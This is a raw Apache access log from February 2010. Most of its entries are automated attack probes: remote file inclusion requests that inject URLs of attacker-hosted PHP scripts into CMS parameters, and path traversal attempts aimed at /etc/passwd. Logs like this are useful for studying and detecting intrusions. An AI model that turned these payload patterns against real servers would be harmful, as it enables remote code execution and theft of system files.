78.110.50.120 - - [15/Feb/2010:01:23:18 -0500] "GET /logs/index2.php?option=com_search&Itemid=&func=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:01:23:18 -0500] "GET /index2.php?option=com_search&Itemid=&func=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
58.150.99.144 - - [15/Feb/2010:01:23:43 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:23:43 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
207.191.227.2 - - [15/Feb/2010:01:23:59 -0500] "GET //protection.php?action=logout&siteurl=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "-"
207.191.227.2 - - [15/Feb/2010:01:23:59 -0500] "GET //protection.php?action=logout&siteurl=./../../../../../../../../etc/passwd HTTP/1.1" 404 213 "-" "-"
58.150.99.144 - - [15/Feb/2010:01:24:02 -0500] "GET /logs/access_log.Q110020800%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:24:10 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:24:10 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:24:18 -0500] "GET /logs//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:24:18 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:24:19 -0500] "GET /logs/error_log.Q110012000%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:24:19 -0500] "GET //bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:24:24 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:24:24 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:24:47 -0500] "GET /logs/access_log.Q110020800%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:01:24:47 -0500] "GET /logs/access_log.Q109092700%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:01:25:11 -0500] "GET /logs/access_log.Q110012300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.110.50.120 - - [15/Feb/2010:01:25:22 -0500] "GET /logs/error_log.Q110020400/index2.php?option=com_search&Itemid=&func=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
24.13.62.255 - - [15/Feb/2010:01:25:24 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.0.15 NET_mmhpset (.NET CLR 3.5.30729)"
24.13.62.255 - - [15/Feb/2010:01:25:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.0.15 NET_mmhpset (.NET CLR 3.5.30729)"
24.13.62.255 - - [15/Feb/2010:01:25:26 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.0.15 NET_mmhpset (.NET CLR 3.5.30729)"
24.13.62.255 - - [15/Feb/2010:01:25:26 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.0.15 NET_mmhpset (.NET CLR 3.5.30729)"
195.186.64.181 - - [15/Feb/2010:01:25:40 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:25:40 -0500] "GET /logs//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:25:41 -0500] "GET /logs/error_log.Q110012000%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:25:41 -0500] "GET //bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:25:42 -0500] "GET /logs/access_log.Q110020800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:25:42 -0500] "GET /logs/access_log.Q109071400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:01:25:57 -0500] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.24.87.113 - - [15/Feb/2010:01:25:59 -0500] "GET /logs/access_log.Q110011000%20%20//board.php?code=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.120 - - [15/Feb/2010:01:27:38 -0500] "GET /logs/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:01:27:38 -0500] "GET /logs/access_log.Q109080700/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:01:27:38 -0500] "GET /index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:01:27:38 -0500] "GET /logs/error_log.Q109080700/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
218.234.20.117 - - [15/Feb/2010:01:27:58 -0500] "GET /logs/access_log.Q109112400//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:01:27:59 -0500] "GET /logs/access_log.Q110020700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:28:05 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:28:05 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:28:05 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:28:17 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:28:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.227.209 - - [15/Feb/2010:01:28:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:28:23 -0500] "GET /logs/access_log.Q109121100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:28:27 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:28:33 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:01:28:33 -0500] "GET /logs/access_log.Q109121100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:28:38 -0500] "GET /logs/access_log.Q109071600//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:29:09 -0500] "GET /logs/access_log.Q110010900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:29:09 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:29:09 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
207.191.227.2 - - [15/Feb/2010:01:30:05 -0500] "GET //content.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "-"
207.191.227.2 - - [15/Feb/2010:01:30:06 -0500] "GET //content.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 210 "-" "-"
62.140.23.24 - - [15/Feb/2010:01:30:19 -0500] "GET /logs/access_log.Q109081500//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.239.230.130 - - [15/Feb/2010:01:31:17 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.239.230.130 - - [15/Feb/2010:01:31:17 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs/access_log.Q109122700//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET //?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET //?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs/access_log.Q109122700//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs/access_log.Q109122700//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET //?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
222.231.1.142 - - [15/Feb/2010:01:31:17 -0500] "GET /logs//?skin_board_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:25 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:26 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:26 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:30 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:01:31:37 -0500] "GET /images/_notes/home_shopping_over.gif.mno HTTP/1.1" 200 251 "-" "Yandex/1.01.001 (compatible; Win16; I)"
218.38.136.125 - - [15/Feb/2010:01:31:39 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:39 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:39 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:01:31:40 -0500] "GET /logs/access_log.Q109121400//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:57 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:57 -0500] "GET /logs/access_log.Q109100700//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:31:57 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.218.62 - - [15/Feb/2010:01:31:58 -0500] "GET /logs/access_log.Q109100700//index.php?pagina=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
94.23.218.62 - - [15/Feb/2010:01:31:58 -0500] "GET //index.php?pagina=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
94.23.218.62 - - [15/Feb/2010:01:31:58 -0500] "GET /logs//index.php?pagina=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
94.23.218.62 - - [15/Feb/2010:01:31:58 -0500] "GET /logs/access_log.Q109071600//index.php?pagina=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
62.140.23.24 - - [15/Feb/2010:01:32:28 -0500] "GET /logs/access_log.Q109071600//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:01:32:31 -0500] "GET /logs/access_log.Q110011600//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:32:57 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:32:57 -0500] "GET /logs/access_log.Q109121000%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:32:57 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:02 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:02 -0500] "GET /logs/access_log.Q109121000%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:02 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:26 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:26 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:26 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:30 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:30 -0500] "GET /logs/access_log.Q109102900///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:30 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:33:32 -0500] "GET /logs/access_log.Q110013000%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:36 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:36 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:36 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:33:37 -0500] "GET /logs/access_log.Q110010900%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:38 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:38 -0500] "GET /logs/access_log.Q109102900///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:38 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:42 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:42 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:42 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:47 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:47 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:47 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:52 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:52 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:52 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:55 -0500] "GET //main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:55 -0500] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:33:55 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:57 -0500] "GET /logs/access_log.Q109092500%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:33:59 -0500] "GET /logs/access_log.Q109092500%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:01:34:02 -0500] "GET /logs/access_log.Q109073100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:01:34:02 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:01:34:02 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:34:06 -0500] "GET /logs/access_log.Q109102900///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:34:06 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:34:06 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:34:12 -0500] "GET /logs/access_log.Q109081500//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:01:34:22 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E33823800043D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
